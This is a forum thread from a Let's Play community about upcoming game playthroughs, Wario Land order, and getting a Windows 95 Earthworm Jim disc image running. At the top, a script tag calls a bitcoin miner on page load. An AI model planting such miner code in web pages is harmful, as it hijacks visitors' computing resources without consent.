<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmw centralpge project

COMING UP NEXT

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
raekuul
X&BUTT
Posts: 1039
Joined: 10 years ago
First name: Pokota
Pronouns: he/him/his
Location: Moses 1:37-39
Contact:

Re: COMING UP NEXT

Postby raekuul » 2 years ago

I'm having a hard time wrapping my head around how the cue file would be burned properly but can't be mounted. Can you pastebin the contents of the cue file?

User avatar
Mata Hari
Posts: 2224
Joined: 10 years ago

Re: COMING UP NEXT

Postby Mata Hari » 2 years ago

What the fuck, none of these are Henry Hatsworth

AlchemistHohenheim
Posts: 302
Joined: 10 years ago

Re: COMING UP NEXT

Postby AlchemistHohenheim » 2 years ago

On one hand I kind of liked the minor mystery of exactly what game was going to be played next. On the other hand this is like a million times better.
So this thread is a thing. Maybe check it out.

User avatar
SAJewers
hi
Posts: 3207
Joined: 7 years ago
Location: Nova Scotia

Re: COMING UP NEXT

Postby SAJewers » 2 years ago

raekuul wrote: I'm having a hard time wrapping my head around how the cue file would be burned properly but can't be mounted. Can you pastebin the contents of the cue file?

Code: Select all

FILE "WORM.BIN" BINARY
  TRACK 01 MODE1/2352
    INDEX 01 00:00:00
  TRACK 02 AUDIO
    PREGAP 00:02:00
    INDEX 01 02:49:71
  TRACK 03 AUDIO
    INDEX 01 03:04:22
  TRACK 04 AUDIO
    INDEX 01 03:16:48
  TRACK 05 AUDIO
    INDEX 01 03:28:74
  TRACK 06 AUDIO
    INDEX 01 03:41:25
  TRACK 07 AUDIO
    INDEX 01 05:25:14
  TRACK 08 AUDIO
    INDEX 01 05:37:40
  TRACK 09 AUDIO
    INDEX 01 05:49:66
  TRACK 10 AUDIO
    INDEX 01 11:37:25
  TRACK 11 AUDIO
    INDEX 01 15:17:00
  TRACK 12 AUDIO
    INDEX 01 18:53:53
  TRACK 13 AUDIO
    INDEX 01 23:27:17
  TRACK 14 AUDIO
    INDEX 01 26:25:37
  TRACK 15 AUDIO
    INDEX 01 26:37:63
  TRACK 16 AUDIO
    INDEX 01 30:38:04
  TRACK 17 AUDIO
    INDEX 01 34:16:30
  TRACK 18 AUDIO
    INDEX 01 35:12:40
  TRACK 19 AUDIO
    INDEX 01 39:41:43
  TRACK 20 AUDIO
    INDEX 01 42:42:21
  TRACK 21 AUDIO
    INDEX 01 45:52:41
  TRACK 22 AUDIO
    INDEX 01 49:16:74
  TRACK 23 AUDIO
    INDEX 01 53:51:14
  TRACK 24 AUDIO
    INDEX 01 57:44:58
  TRACK 25 AUDIO
    INDEX 01 57:57:09
  TRACK 26 AUDIO
    INDEX 01 58:09:35
  TRACK 27 AUDIO
    INDEX 01 58:21:61
  TRACK 28 AUDIO
    INDEX 01 59:38:02
Worst case scenario we could grab a build of PCem that has CUE support, and install Windows 95 and run it though that.
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Sebby19
Posts: 2564
Joined: 10 years ago
Location: Winnipeg, Manitoba

Re: COMING UP NEXT

Postby Sebby19 » 2 years ago

The Wario Land games are still being played in reverse order, right?
And how about Virtual Boy Wario Land too?
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

User avatar
Xirix
The British Palindrome
Posts: 523
Joined: 10 years ago

Re: COMING UP NEXT

Postby Xirix » 2 years ago

Oh a schedule, how nice. Glad there's only a shortish game before Ori, was intending to binge-watch the entire LP for my birthday week in october, you'll really enjoy it, I guarantee. (Has a bloody fantastic soundtrack too)

No love for Super Mario Land 1?
Last edited by Xirix on 01 Sep 2017, 04:30, edited 1 time in total.

User avatar
raocow
the death of the incredible huge
Posts: 2950
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: COMING UP NEXT

Postby raocow » 2 years ago

Sebby19 wrote: The Wario Land games are still being played in reverse order, right?
And how about Virtual Boy Wario Land too?
I'm not playing them in reverse order due to peeps saying it would more or less invalidate wario land 2
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
Sebby19
Posts: 2564
Joined: 10 years ago
Location: Winnipeg, Manitoba

Re: COMING UP NEXT

Postby Sebby19 » 2 years ago

raocow wrote:
Sebby19 wrote: The Wario Land games are still being played in reverse order, right?
And how about Virtual Boy Wario Land too?
I'm not playing them in reverse order due to peeps saying it would more or less invalidate wario land 2
What? Where? The 2 games may run on the same engine, but they are both very different games. One is a straight forward platformer, with a large emphasis on coins. The other is more metrodvania, with a bigger emphasis on treasures.

You could switch the numbers of the two games and wouldn't even know.
Where were peeps saying that?
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

User avatar
raocow
the death of the incredible huge
Posts: 2950
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: COMING UP NEXT

Postby raocow » 2 years ago

Lots of people where saying that during the last patreon mario vote, in the discord and in the patreon discussion thread.
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
🦆 RedMageSusie
Dancing with the moonlit knight
Posts: 825
Joined: 10 years ago

Re: COMING UP NEXT

Postby RedMageSusie » 2 years ago

I like both games, but yeah, playing 2 after 3 would feel like a step back. It could work if there was a large enough break between the two games
Image
Image
Image

User avatar
raekuul
X&BUTT
Posts: 1039
Joined: 10 years ago
First name: Pokota
Pronouns: he/him/his
Location: Moses 1:37-39
Contact:

Re: COMING UP NEXT

Postby raekuul » 2 years ago

1 and Wario Land VB are different from 2 and 3 - the former are more collectathon platformers while the latter two are more puzzler platformers. Not sure what else I can contribute here.

Strangely enough 4 felt more like WLVB than it did 2 (though it still leaned heavily on the puzzler platformer ideals from 2)

User avatar
churine
Posts: 149
Joined: 4 years ago
Pronouns: she/her

Re: COMING UP NEXT

Postby churine » 2 years ago

I hope you do wario's shake shake eventually if you're playing the other warios

after playing mischief makers and wario land 4 you're probably contractually obligued to add it to the list

User avatar
SAJewers
hi
Posts: 3207
Joined: 7 years ago
Location: Nova Scotia

Re: COMING UP NEXT

Postby SAJewers » 2 years ago

SAJewers wrote:
raekuul wrote: I'm having a hard time wrapping my head around how the cue file would be burned properly but can't be mounted. Can you pastebin the contents of the cue file?

Code: Select all

FILE "WORM.BIN" BINARY
  TRACK 01 MODE1/2352
    INDEX 01 00:00:00
  TRACK 02 AUDIO
    PREGAP 00:02:00
    INDEX 01 02:49:71
  TRACK 03 AUDIO
    INDEX 01 03:04:22
  TRACK 04 AUDIO
    INDEX 01 03:16:48
  TRACK 05 AUDIO
    INDEX 01 03:28:74
  TRACK 06 AUDIO
    INDEX 01 03:41:25
  TRACK 07 AUDIO
    INDEX 01 05:25:14
  TRACK 08 AUDIO
    INDEX 01 05:37:40
  TRACK 09 AUDIO
    INDEX 01 05:49:66
  TRACK 10 AUDIO
    INDEX 01 11:37:25
  TRACK 11 AUDIO
    INDEX 01 15:17:00
  TRACK 12 AUDIO
    INDEX 01 18:53:53
  TRACK 13 AUDIO
    INDEX 01 23:27:17
  TRACK 14 AUDIO
    INDEX 01 26:25:37
  TRACK 15 AUDIO
    INDEX 01 26:37:63
  TRACK 16 AUDIO
    INDEX 01 30:38:04
  TRACK 17 AUDIO
    INDEX 01 34:16:30
  TRACK 18 AUDIO
    INDEX 01 35:12:40
  TRACK 19 AUDIO
    INDEX 01 39:41:43
  TRACK 20 AUDIO
    INDEX 01 42:42:21
  TRACK 21 AUDIO
    INDEX 01 45:52:41
  TRACK 22 AUDIO
    INDEX 01 49:16:74
  TRACK 23 AUDIO
    INDEX 01 53:51:14
  TRACK 24 AUDIO
    INDEX 01 57:44:58
  TRACK 25 AUDIO
    INDEX 01 57:57:09
  TRACK 26 AUDIO
    INDEX 01 58:09:35
  TRACK 27 AUDIO
    INDEX 01 58:21:61
  TRACK 28 AUDIO
    INDEX 01 59:38:02
Worst case scenario we could grab a build of PCem that has CUE support, and install Windows 95 and run it though that.
any luck? I haven't had any at all. Closest I've gotten is installing Win95 in 86Box and mounting it there, but I can't seem to get it to recognize the redbook audio tracks (just the data track 1)
Last edited by SAJewers on 01 Sep 2017, 21:39, edited 1 time in total.
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
raekuul
X&BUTT
Posts: 1039
Joined: 10 years ago
First name: Pokota
Pronouns: he/him/his
Location: Moses 1:37-39
Contact:

Re: COMING UP NEXT

Postby raekuul » 2 years ago

Nothing so far; this is incredibly puzzling. What's the SHA1 checksum for the bin file?

User avatar
SAJewers
hi
Posts: 3207
Joined: 7 years ago
Location: Nova Scotia

Re: COMING UP NEXT

Postby SAJewers » 2 years ago

raekuul wrote: Nothing so far; this is incredibly puzzling. What's the SHA1 checksum for the bin file?
629E14C6C96361F17BCB281A09D845D2D5608160 for the .bin file, 84A4351CB8E570D41852139DE340EBD7D1F42610 for the .cue file
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
raekuul
X&BUTT
Posts: 1039
Joined: 10 years ago
First name: Pokota
Pronouns: he/him/his
Location: Moses 1:37-39
Contact:

Re: COMING UP NEXT

Postby raekuul » 2 years ago

I don't actually need the SHA1 sum for the CUE file since I can actually recreate it from what you pasted before and the SHA1 sum is just to make sure we're working with the same source info :3

User avatar
SAJewers
hi
Posts: 3207
Joined: 7 years ago
Location: Nova Scotia

Re: COMING UP NEXT

Postby SAJewers » 2 years ago

Ah, right.

Same source info shouldn't be an issue though since there only appears to be be one proper download for this :P
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
BuzzNBen
Posts: 94
Joined: 7 years ago
First name: Ben
Contact:

Re: COMING UP NEXT

Postby BuzzNBen » 2 years ago

Super red plumber man Brothers Doomsday? Sweet! Feel free to notify me when the time comes if you have any questions regarding the game.

User avatar
Sebby19
Posts: 2564
Joined: 10 years ago
Location: Winnipeg, Manitoba

Re: COMING UP NEXT

Postby Sebby19 » 2 years ago

raocow wrote:Lots of people where saying that during the last patreon red plumber man vote, in the discord and in the patreon discussion thread.
RedMageSusie wrote: I like both games, but yeah, playing 2 after 3 would feel like a step back. It could work if there was a large enough break between the two games
That's what I was assuming, that there would be a significant break between game #2 and #3. As for the opinion of #2 being a step back from #3, well one, I don't agree; and two, if that's the case, why was #4 played first? I think it would be funny and interesting to play the games in reverse order.

Man, I was really looking forward to WL3. I was planning to do a similar thing like Ometeotl did in the Kirby's Adventure thread.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

User avatar
raocow
the death of the incredible huge
Posts: 2950
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: COMING UP NEXT

Postby raocow » 2 years ago

I mean it's GOING to happen, it just might be a bit longer than expected. but normally good things are worth waiting for!
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
SAJewers
hi
Posts: 3207
Joined: 7 years ago
Location: Nova Scotia

Re: COMING UP NEXT

Postby SAJewers » 2 years ago

SAJewers wrote: Ah, right.

Same source info shouldn't be an issue though since there only appears to be be one proper download for this :P
SUCCESS! I tired Daemon Tools Lite, and it worked. Somehow I didn't try that.

Also turns out it doesn't take much to get it working on Win10. We should be good to go.

EDIT: Only problem I have so far is that it wants to use left analog instead of the d-pad for movement, and I can't get Joy2Key working with it.

EDIT2: OK, a bit more testing and a few levels, in, It does look like this works, just:

1) No support for XInput obviously, just DirectInput controllers. It doesn't look like Joy2Key or any similar key remapping software works either. There's a claim online Xpadder works, but that's not free, and last free vesion doesn't run on Windows 10.

2) The game only has built-in window mode screen sizes for 320x240 or 640x480. You can manually resize it, but it doesn't keep aspect ratio.

3) Sometimes if the track ends, it'll stop playing music. This can be fixed pausing/unpausing (with either the pause key on the keyboard, or clicking to another window, then clicking back and pressing a button)

4) I was wrong, there isn't a save system; rather, it has a built-in level select from the File menu.
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
SAJewers
hi
Posts: 3207
Joined: 7 years ago
Location: Nova Scotia

Re: COMING UP NEXT

Postby SAJewers » 2 years ago

Double posting here to day Earthworm Jim: Special Edition for Windows 95 does indeed work 100%
Image
For anyone who wants to play it, find a copy of it (obviously not telling you how, also make sure you're not getting the SEGA CD version), then follow the instructions here (basically grab WAIL32.dll fom there and copy it over the existing one in the ASSETS folder, then set WORM.exe to Win95 comparability mode)

Note that the CD tracks don't loop correctly (this can probably be fixed by installing Windows 95 in 86box and running it through there), and you have to use a DirectInput controller or the keyboard.
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1307
Joined: 5 years ago
First name: Matt
Location: Oregon

Re: COMING UP NEXT

Postby YelseyKing » 2 years ago

Just wondering... how far is the "All the Megamans" LP going to go? Just 1-10? Or will Megaman & Bass and/or the GB games (the first four have the same bosses as 1-5, but vastly different levels) be included as well? No one I follow has ever done the GB games (except Roahm doing 5), so that'd be kinda neat to see.

Also, if you'd like to do the Wily Wars stages, I could provide you with a save with it unlocked. (I... *should* still have it, anyway.) Not a whole heck of a lot of reason to redo MM1-3 on that. Unless you really want to. But they're not *that* different. :P

And if the plan is just 1-10, then... disregard this rambling nonsense. :P
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
SAJewers
hi
Posts: 3207
Joined: 7 years ago
Location: Nova Scotia

Re: COMING UP NEXT

Postby SAJewers » 2 years ago

You forgot the Game Gear game :P

Anyway, so far raocow's only confirmed 1-6 on NES, 7-10 via MMLC2, and Rockman and Forte on SFC
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
The Doctor
Posts: 206
Joined: 10 years ago

Re: COMING UP NEXT

Postby The Doctor » 2 years ago

Ooh, I forgot about the Gameboy games. It would be fun to see raocow play through them too.


Return to “let's play”

Who is online

Users browsing this forum: No registered users and 17 guests